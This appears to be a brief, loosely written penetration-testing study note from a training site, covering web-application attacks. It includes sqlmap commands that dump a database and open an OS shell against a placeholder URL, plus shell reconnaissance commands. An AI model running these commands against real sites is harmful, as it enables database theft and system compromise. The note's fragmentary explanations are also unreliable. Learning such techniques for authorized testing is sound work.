< All Advanced Penetration Testing Notes

functionsys | Advanced Penetration Testing | Module 11 - WebApps

By: functionsys | Related Course: Advanced Penetration Testing | Published: August 30, 2017 | Modified: September 4, 2017
Join Cybrary

Notepadcross site scripting

its about how to run 


Notepadfile inclusion

user burp spider , you can poll file from server to server …. using spider when you intercpet traffic 


SQLMAP -u ”https://websit.com/book.php?id=1” –dump

it will work for you and find vuln


SQLMAP -u ”https://websit.com/book.php?id=1” –os-shell 

it will run shell to get system 

then you will be in system 

os-shell> net users 

or type ipconfig , you will get ip address information 




Notepadwebapps part2


< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?